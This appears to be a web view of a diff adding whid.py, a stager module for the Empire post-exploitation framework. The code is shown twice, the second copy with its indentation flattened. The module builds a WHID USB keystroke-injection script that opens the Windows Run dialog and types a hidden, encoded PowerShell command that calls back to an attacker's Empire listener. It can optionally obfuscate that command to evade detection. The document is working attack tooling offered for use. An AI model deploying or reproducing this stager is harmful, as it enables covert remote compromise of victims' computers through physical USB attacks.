whid-injector · September 27, 2019 06:38
diff --git a/whid.py b/whid.py
 from lib.common import helpers

 class Stager:

    def __init__(self, mainMenu, params=[]):

        self.info = {
            'Name': 'WHIDLauncher',

            'Author': ['@LucaBongiorni','@harmj0y','@kisasondi'],

            'Description': ('Generates a WHID script that runs a one-liner stage0 launcher for Empire.'),

            'Comments': [
                ''
            ]
        }

        # any options needed by the stager, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Listener' : {
                'Description'   :   'Listener to generate stager for.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'Language' : {
                'Description'   :   'Language of the stager to generate.',
                'Required'      :   True,
                'Value'         :   'powershell'
            },
            'Interpreter' : {
                'Description'   :   'Which interpreter do you want? (powershell or cmd)',
                'Required'      :   False,
                'Value'         :   'powershell'
            },
            'StagerRetries' : {
                'Description'   :   'Times for the stager to retry connecting.',
                'Required'      :   False,
                'Value'         :   '0'
            },
            'OutFile' : {
                'Description'   :   'File to output WHID script to, otherwise displayed on the screen.',
                'Required'      :   False,
                'Value'         :   ''
            },
            'Obfuscate' : {
                'Description'   :   'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
                'Required'      :   False,
                'Value'         :   'False'
            },
            'ObfuscateCommand' : {
                'Description'   :   'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
                'Required'      :   False,
                'Value'         :   r'Token\All\1,Launcher\STDIN++\12467'
            },
            'UserAgent' : {
                'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
                'Required'      :   False,
                'Value'         :   'default'
            },
            'Proxy' : {
                'Description'   :   'Proxy to use for request (default, none, or other).',
                'Required'      :   False,
                'Value'         :   'default'
            },
            'ProxyCreds' : {
                'Description'   :   'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
                'Required'      :   False,
                'Value'         :   'default'
            }
        }

        # save off a copy of the mainMenu object to access external functionality
        #   like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        for param in params:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value


    def generate(self):

        # extract all of our options
        language = self.options['Language']['Value']
        interpreter = self.options['Interpreter']['Value']
        listenerName = self.options['Listener']['Value']
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']
        obfuscate = self.options['Obfuscate']['Value']
        obfuscateCommand = self.options['ObfuscateCommand']['Value']
        
        obfuscateScript = False
        if obfuscate.lower() == "true":
            obfuscateScript = True

        # generate the launcher code
        launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, obfuscate=obfuscateScript, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
        
        if launcher == "" or interpreter == "":
            print helpers.color("[!] Error in launcher command generation.")
            return ""
        else:
            enc = launcher.split(" ")[-1]

            WHIDCode =  "DefaultDelay:500\n"
            WHIDCode += "Press:131+114\n"
            WHIDCode += "CustomDelay:1000\n"
            WHIDCode += "PrintLine:"+ interpreter + "\n"
            if obfuscateScript and "launcher" in obfuscateCommand.lower():
                WHIDCode += "PrintLine:"+launcher+" \n"
            else:
                enc = launcher.split(" ")[-1]
                WHIDCode += "PrintLine:powershell -w 1 -nop -noni -enc "+enc+" \n"

            return WHIDCode
	from lib.common import helpers

	class Stager:

	def __init__(self, mainMenu, params=[]):

	self.info = {
	'Name': 'WHIDLauncher',

	'Author': ['@LucaBongiorni','@harmj0y','@kisasondi'],

	'Description': ('Generates a WHID script that runs a one-liner stage0 launcher for Empire.'),

	'Comments': [
	''
	]
	}

	# any options needed by the stager, settable during runtime
	self.options = {
	# format:
	# value_name : {description, required, default_value}
	'Listener' : {
	'Description' : 'Listener to generate stager for.',
	'Required' : True,
	'Value' : ''
	},
	'Language' : {
	'Description' : 'Language of the stager to generate.',
	'Required' : True,
	'Value' : 'powershell'
	},
	'Interpreter' : {
	'Description' : 'Which interpreter do you want? (powershell or cmd)',
	'Required' : False,
	'Value' : 'powershell'
	},
	'StagerRetries' : {
	'Description' : 'Times for the stager to retry connecting.',
	'Required' : False,
	'Value' : '0'
	},
	'OutFile' : {
	'Description' : 'File to output WHID script to, otherwise displayed on the screen.',
	'Required' : False,
	'Value' : ''
	},
	'Obfuscate' : {
	'Description' : 'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
	'Required' : False,
	'Value' : 'False'
	},
	'ObfuscateCommand' : {
	'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
	'Required' : False,
	'Value' : r'Token\All\1,Launcher\STDIN++\12467'
	},
	'UserAgent' : {
	'Description' : 'User-agent string to use for the staging request (default, none, or other).',
	'Required' : False,
	'Value' : 'default'
	},
	'Proxy' : {
	'Description' : 'Proxy to use for request (default, none, or other).',
	'Required' : False,
	'Value' : 'default'
	},
	'ProxyCreds' : {
	'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
	'Required' : False,
	'Value' : 'default'
	}
	}

	# save off a copy of the mainMenu object to access external functionality
	# like listeners/agent handlers/etc.
	self.mainMenu = mainMenu

	for param in params:
	# parameter format is [Name, Value]
	option, value = param
	if option in self.options:
	self.options[option]['Value'] = value


	def generate(self):

	# extract all of our options
	language = self.options['Language']['Value']
	interpreter = self.options['Interpreter']['Value']
	listenerName = self.options['Listener']['Value']
	userAgent = self.options['UserAgent']['Value']
	proxy = self.options['Proxy']['Value']
	proxyCreds = self.options['ProxyCreds']['Value']
	stagerRetries = self.options['StagerRetries']['Value']
	obfuscate = self.options['Obfuscate']['Value']
	obfuscateCommand = self.options['ObfuscateCommand']['Value']

	obfuscateScript = False
	if obfuscate.lower() == "true":
	obfuscateScript = True

	# generate the launcher code
	launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, obfuscate=obfuscateScript, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)

	if launcher == "" or interpreter == "":
	print helpers.color("[!] Error in launcher command generation.")
	return ""
	else:
	enc = launcher.split(" ")[-1]

	WHIDCode = "DefaultDelay:500\n"
	WHIDCode += "Press:131+114\n"
	WHIDCode += "CustomDelay:1000\n"
	WHIDCode += "PrintLine:"+ interpreter + "\n"
	if obfuscateScript and "launcher" in obfuscateCommand.lower():
	WHIDCode += "PrintLine:"+launcher+" \n"
	else:
	enc = launcher.split(" ")[-1]
	WHIDCode += "PrintLine:powershell -w 1 -nop -noni -enc "+enc+" \n"

	return WHIDCode